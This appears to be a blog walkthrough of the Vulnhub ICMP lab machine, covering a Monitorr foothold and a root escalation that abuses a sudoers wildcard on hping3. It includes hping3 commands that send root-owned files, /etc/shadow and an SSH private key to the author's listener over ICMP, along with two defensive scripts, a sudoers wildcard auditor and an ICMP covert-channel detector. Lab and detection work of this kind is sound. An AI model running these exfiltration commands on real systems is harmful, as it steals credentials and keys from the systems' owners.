I haven’t written a post for a bit; I’ve been feeling a bit burned out. Still doing something productive every day - no zero days.

What have I done since I last wrote?

  1. HTB Time. This is an active machine, so no writeup just yet.
  2. THM Vulnet. This is basically Shuriken from Vulnhub. I haven’t written it up and I probably won’t, even though I quite liked it.
  3. Vulnhub ICMP.

I had a quick go at Vulnhub Crossroads and didn’t like it. It’s a webpage ripped from what appears to be a real drug/alcohol rehab facility. Way to stay classy.

ICMP Foothold

This thing runs Monitorr 1.7.6, which has multiple vulns; the Python exploit from Searchsploit works.

User Fox

We are www-data but we can read a file belonging to fox called reminder. It says:

crypt with crypt.php: done, it works
work on decrypt with crypt.php: howto?!?

There is a directory called devel but we can’t do a listing. We intuit that crypt.php is in devel, and we can read it; it contains the password for Fox.

Privesc (sort of)

$ sudo -l
Matching Defaults entries for fox on icmp:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User fox may run the following commands on icmp:
    (root) /usr/sbin/hping3 --icmp *
    (root) /usr/bin/killall hping3

This was a little new to me. I’ve done an hping3 privesc before where you just run the binary with no arguments; that drops you into hping3’s command prompt, from which we can launch a shell. In this case the sudoers rule forces us to supply an argument after --icmp, and that argument is a host.
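The check a defender would want here is an audit of rules like the one above. The script below is an added example for this post, not something from the box or from sudo itself: it parses the command section of `sudo -l` output (the page's own output is embedded as the constructed sample) and flags rules whose argument list contains a wildcard, because sudoers matches the argument string as a single space-separated string, so `*` also admits any extra options the user cares to add. Rules with no argument list (sudo then accepts any arguments) and NOPASSWD tags are flagged as well.

```python
import re

# One command line from the "may run the following commands" part of
# `sudo -l`: "(runas) [TAG: ...] /path/to/cmd [args]".
_RULE = re.compile(
    r"^\s*\((?P<runas>[^)]*)\)\s*"
    r"(?P<tags>(?:[A-Z_]+:\s*)*)"
    r"(?P<cmd>\S+)"
    r"(?:\s+(?P<args>.*?))?\s*$"
)

# Constructed sample: the `sudo -l` output quoted in the writeup.
SAMPLE_SUDO_L = r"""Matching Defaults entries for fox on icmp:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User fox may run the following commands on icmp:
    (root) /usr/sbin/hping3 --icmp *
    (root) /usr/bin/killall hping3
"""


def parse_sudo_l(text: str):
    """Return (runas, tags, command, args) for each rule in `sudo -l` output."""
    rules = []
    in_commands = False
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_commands = True        # everything after this header is a rule
            continue
        if not in_commands:
            continue
        m = _RULE.match(line)
        if m:
            rules.append((m["runas"], m["tags"].strip(), m["cmd"], m["args"] or ""))
    return rules


def audit(rules):
    """Return (command, problem) pairs for rules that let the caller steer the
    privileged command further than the rule author probably intended."""
    problems = []
    for _runas, tags, cmd, args in rules:
        if args == "":
            # sudoers: a command listed without arguments may be run with any.
            problems.append((cmd, "no argument list: any arguments are accepted"))
        elif any(ch in args for ch in "*?["):
            # sudoers matches arguments as one space-separated string, so a
            # wildcard spans word boundaries and accepts additional options.
            problems.append((cmd, "wildcard in arguments: '%s' matches across "
                                  "word boundaries, so extra options are accepted"
                             % args))
        if "NOPASSWD" in tags:
            problems.append((cmd, "NOPASSWD: runs without authentication"))
    return problems


if __name__ == "__main__":
    for cmd, problem in audit(parse_sudo_l(SAMPLE_SUDO_L)):
        print("%s: %s" % (cmd, problem))
```

Run against the sample, the hping3 rule is reported (its `*` lets `--sign`, `-d` and `--file` through, which is exactly what the rest of this post relies on) while the killall rule, whose single argument is fixed, is not.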

I make a new directory and touch a file:


Now when I run:

sudo -u root /usr/sbin/hping3 --icmp *

it pings my box: the shell expands the unquoted `*` to the name of the file I just created, hping3 takes that as the target host, and the sudoers wildcard still matches. We can exfil files. Local machine:

└─# hping3 --listen -I eth0 --sign MSGID1

Remote machine:

$ sudo -u root /usr/sbin/hping3 --icmp * --sign MSGID1 -d 150 -c 1 --file /root/proof.txt
HPING (enp0s3 icmp mode set, 28 headers + 150 data bytes
[main] memlockall(): Operation not supported
Warning: cant disable memory paging!
len=178 ip= ttl=64 id=24284 icmp_seq=0 rtt=8.3 ms

--- hping statistic ---
1 packets transmitted, 1 packets received, 0% packet loss
round-trip min/avg/max = 8.3/8.3/8.3 ms

And we get:


We can also use this to exfil the shadow file:

sudo -u root /usr/sbin/hping3 --icmp * --sign MSGID1 -d 9999 -c 1 --file /etc/shadow

We can also use it to exfil the SSH private key:

sudo -u root /usr/sbin/hping3 --icmp * --sign MSGID1 -d 1000 -c 3 -i 5 -u --file /root/.ssh/id_rsa

However, at the moment it keeps telling me the key is in an invalid format, even though it looks okay. So, yeah.
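From the other side of the wire, the `--sign`/`--file` transfers above are easy to spot, because every echo request carries the same marker and more data than a normal ping. The script below is an added example for this post, not the author's code and not part of hping3: it parses raw IPv4/ICMP frames, flags echo requests that are oversized or start with a known signature, and reassembles the carried bytes in sequence order. The payload layout it assumes (signature first, then file bytes, NUL-padded to the `-d` size) is my model of what hping3 emits, and all frames are constructed in the script, so nothing is sent anywhere.

```python
import struct

SIGNATURE = b"MSGID1"      # the marker used with --sign in the writeup
NORMAL_PING_MAX = 64       # Linux ping sends 56 data bytes, Windows 32
SECRET = b"fake_line_one_for_demo\nfake_line_two_for_demo\n"   # constructed "file"


def _checksum(data: bytes) -> int:
    """RFC 1071 one's-complement checksum over the ICMP header and data."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    total = (total >> 16) + (total & 0xFFFF)
    total += total >> 16
    return (~total) & 0xFFFF


def build_echo_request(src: str, dst: str, data: bytes, seq: int) -> bytes:
    """Build a raw IPv4 + ICMP echo-request frame for the demo traffic.
    The IP header checksum is left at zero; the parser never checks it."""
    hdr = struct.pack("!BBHHH", 8, 0, 0, 0x1234, seq)
    hdr = struct.pack("!BBHHH", 8, 0, _checksum(hdr + data), 0x1234, seq)
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(hdr) + len(data),
                     0, 0, 64, 1, 0,
                     bytes(int(o) for o in src.split(".")),
                     bytes(int(o) for o in dst.split(".")))
    return ip + hdr + data


def parse_icmp(frame: bytes):
    """Return (src, dst, icmp_type, seq, data) for an ICMP frame, else None."""
    ihl = (frame[0] & 0x0F) * 4
    if frame[9] != 1 or len(frame) < ihl + 8:        # protocol 1 = ICMP
        return None
    src = ".".join(str(b) for b in frame[12:16])
    dst = ".".join(str(b) for b in frame[16:20])
    icmp_type, _code, _csum, _ident, seq = struct.unpack("!BBHHH", frame[ihl:ihl + 8])
    return src, dst, icmp_type, seq, frame[ihl + 8:]


def modelled_payload(file_bytes: bytes, size: int, signature: bytes = SIGNATURE) -> bytes:
    """Assumed data field of `hping3 --sign SIG -d SIZE --file F`:
    signature, then file bytes, NUL-padded or cut to SIZE."""
    body = signature + file_bytes
    return body[:size] if len(body) >= size else body + b"\x00" * (size - len(body))


def inspect(frames, signature: bytes = SIGNATURE):
    """Flag echo requests that look like a covert channel: a payload larger
    than any normal ping, or one that starts with a known signature."""
    findings = []
    for frame in frames:
        parsed = parse_icmp(frame)
        if parsed is None:
            continue
        src, dst, icmp_type, seq, data = parsed
        if icmp_type != 8:                            # echo request only
            continue
        reasons = []
        if len(data) > NORMAL_PING_MAX:
            reasons.append("oversized payload (%d bytes)" % len(data))
        if signature and data.startswith(signature):
            reasons.append("exfil signature %r" % signature)
        if reasons:
            findings.append({"src": src, "dst": dst, "seq": seq,
                             "data": data, "reasons": reasons})
    return findings


def reassemble(findings, signature: bytes = SIGNATURE) -> bytes:
    """Recover the carried bytes from signed packets, ordered by ICMP sequence.
    Trailing NUL padding is stripped per chunk, which suits text files but
    would damage a binary file whose chunks really end in NUL bytes."""
    chunks = sorted((f["seq"], f["data"]) for f in findings
                    if f["data"].startswith(signature))
    return b"".join(d[len(signature):].rstrip(b"\x00") for _, d in chunks)


def sample_frames():
    """Constructed traffic: an ordinary ping, SECRET split over two signed
    40-byte payloads (deliberately out of order), and a large unsigned probe."""
    room = 40 - len(SIGNATURE)
    chunks = [SECRET[i:i + room] for i in range(0, len(SECRET), room)]
    frames = [build_echo_request("10.0.0.5", "10.0.0.9", bytes(range(56)), 7)]
    frames += [build_echo_request("10.0.0.7", "10.0.0.9", modelled_payload(c, 40), seq)
               for seq, c in reversed(list(enumerate(chunks)))]
    frames.append(build_echo_request("10.0.0.8", "10.0.0.9", b"A" * 150, 0))
    return frames


if __name__ == "__main__":
    hits = inspect(sample_frames())
    for h in hits:
        print("%s -> %s seq=%d: %s" % (h["src"], h["dst"], h["seq"], "; ".join(h["reasons"])))
    print(reassemble(hits).decode())
```

The size heuristic catches the `-d 150` and `-d 9999` transfers even without knowing the signature, while the signature match catches small chunks like the 40-byte ones in the sample; on a real sensor you would feed `parse_icmp` the IP packets from a pcap or a raw socket instead of `sample_frames()`.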